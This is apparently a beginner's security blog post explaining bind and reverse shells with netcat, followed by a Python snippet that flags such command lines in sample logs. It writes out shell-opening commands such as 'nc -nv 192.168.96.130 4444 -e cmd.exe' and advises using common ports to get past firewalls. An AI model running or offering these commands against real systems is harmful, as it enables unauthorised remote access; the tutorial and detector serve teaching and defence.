Reverse & Bind Shells for everyone

XOR-Hacks
Aug 2, 2020


So what is a shell?

According to wikipedia:

In computing, a shell is a user interface for access to an operating system’s services. In general, operating system shells use either a command-line interface(CLI) or graphical user interface(GUI), depending on a computer’s role and particular operation. It is named a shell because it is the outermost layer around the operating system.

To put it simply, we all use a shell; it is just a matter of which kind. Most of us use a GUI (graphical user interface), the windows and icons on a screen that you click on and interact with, whereas a CLI (command-line interface) is something you encounter more often when working in the tech industry, via the command prompt or a terminal.

There are two types of shells.

  1. Bind Shell
  2. Reverse Shell

My Description of it

A bind shell or a reverse shell essentially gives you the ability to run commands over a CLI on another system (the target), which lets you perform actions on that system, malicious or not. There are multiple ways to achieve this, but those are out of the scope of this article.

Both of these shells can be created with simple tools and utilities such as nc, socat and PowerShell on Windows. As nc (netcat) is the most popular and the friendliest to use, I will show all my examples with it.

Note: Netcat is not present on a Windows machine by default, so if the target is a Windows system you would have to download it onto that system.

What is a Bind Shell ?

A bind shell is when the listener is running on the target and you are presented with a command shell when you connect to it. In other words, the target waits for us to connect to it.

As an example, say you need your System Administrator at work to connect to your office system (Windows) for some maintenance.

So on your office system you would open the command prompt (cmd.exe) and enter something similar to this:

nc -nvlp <PORT> -e cmd.exe

Windows Bind Shell receive

In this image we are using nc.exe and essentially saying that anyone who connects to our system on TCP port 4444 will be presented with a command shell (CLI).

To connect to the Windows system, your System Administrator would have to know your IP address and the port you are listening on, which is 4444 in our case.

nc -nv <IP> <PORT>

Connecting to a bind shell from kali

Now we can see that we are able to connect to the Windows machine from our Kali Linux machine, which gives us the same amount of control via the CLI that a regular user would have on their own system.

After setting up a bind shell listener on a target machine you can scan it with a tool like nmap to confirm whether the TCP port you chose is open; it should show up something like this.

nmap -sC -sV <IP>

nmap scan of Windows target.

But what is a reverse shell?

With a bind shell we connect to the target, which is fine if no firewall filters inbound connections. With a reverse shell, by contrast, we set up the listener on our own system (the attacker) and have the target connect to us and provide us with a command shell.

As an example, say we need a friend to help us with something on our work system (Windows). To be able to receive a connection from us, our friend would first need to set up a listener.

nc -lvnp <PORT>

netcat listener on Windows

Now, to connect to our friend, who is listening for a connection, we need to know the IP and the port to connect to.

nc -nv 192.168.96.130 4444 -e cmd.exe

Reverse Shell from Windows To Linux

Now we can see it is quite similar to a bind shell, but while connecting to our friend we are providing them with a command shell by using the ‘-e’ flag and passing ‘cmd.exe’ as its parameter.

While on their end they would receive the connection as:

Catching a shell on netcat from a windows system.

While both bind and reverse shells have their own advantages and disadvantages, it is good practice to know both and when each would serve our purposes better. While pen-testing you will find reverse shells to be far more common than bind shells, and they are usually what people mean when they say “I got a shell on the box”.

On a personal note, you should prefer reverse shells over bind shells for the following reasons:

  1. A bind shell opens up the target to unauthorized access by other actors and can be detected with simple network scanning tools, as shown in the section about it.
  2. Reverse shells can use popular ports (e.g. 53, 80, 443) to bypass firewall restrictions, as outbound connections from internal networks to external networks on those ports are typically allowed.
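As an added example (not part of the original post), the following Python reads constructed process-creation records and flags the two netcat patterns shown above: a listener started with -e (bind shell) and an outbound connection made with -e (reverse shell). Because a reverse shell may go out on 53, 80 or 443, the check keys on the command line rather than the port; the names SAMPLE_EVENTS, classify_netcat and scan_events are hypothetical.

```python
# Constructed sample records ("host,user,command line"), not taken from any real log.
SAMPLE_EVENTS = [
    "WS-07,alice,nc.exe -nvlp 4444 -e cmd.exe",
    "WS-07,alice,nc.exe -nv 192.168.96.130 4444 -e cmd.exe",
    "WS-12,bob,nc.exe -nv 10.0.0.5 80",
    "WS-03,carol,notepad.exe report.txt",
]
NETCAT_NAMES = {"nc", "nc.exe", "netcat"}


def classify_netcat(cmdline):
    """Classify a netcat command line that hands a program to the connection
    with -e (the bind/reverse shell pattern above); None if not applicable."""
    argv = cmdline.split()  # whitespace split is enough for nc invocations like those above
    exe = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower() if argv else ""
    if exe not in NETCAT_NAMES:
        return None
    listening, port, program, positional, i = False, None, None, [], 1
    while i < len(argv):
        tok = argv[i]
        if len(tok) > 1 and tok[0] == "-" and tok[1] != "-":
            for letter in tok[1:]:  # flag clusters such as -nvlp or -lvnp
                if letter == "l":
                    listening = True
                elif letter in "pe" and i + 1 < len(argv):
                    i += 1  # -p and -e each take the next token as their value
                    port, program = (argv[i], program) if letter == "p" else (port, argv[i])
        else:
            positional.append(tok)
        i += 1
    if program is None:
        return None  # plain netcat use (no program handed to the socket) is not flagged
    if listening:  # bind shell: the target listens, so the port is visible to a scan
        return {"kind": "bind shell", "port": port or (positional[0] if positional else None),
                "remote": None, "program": program}
    # reverse shell: outbound connect; a common destination port alone will not stand out
    return {"kind": "reverse shell", "remote": positional[0] if positional else None,
            "port": positional[1] if len(positional) > 1 else None, "program": program}


def scan_events(events):
    """Run the classifier over host,user,cmdline records and keep the hits."""
    findings = []
    for line in events:
        host, user, cmdline = line.split(",", 2)
        details = classify_netcat(cmdline)
        if details:
            findings.append({"host": host, "user": user, **details})
    return findings
```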

Systems Used:

  • Attacker: Kali Linux 2020.1
  • Target: Windows 10

Tools:

  • nc(Windows and Linux)
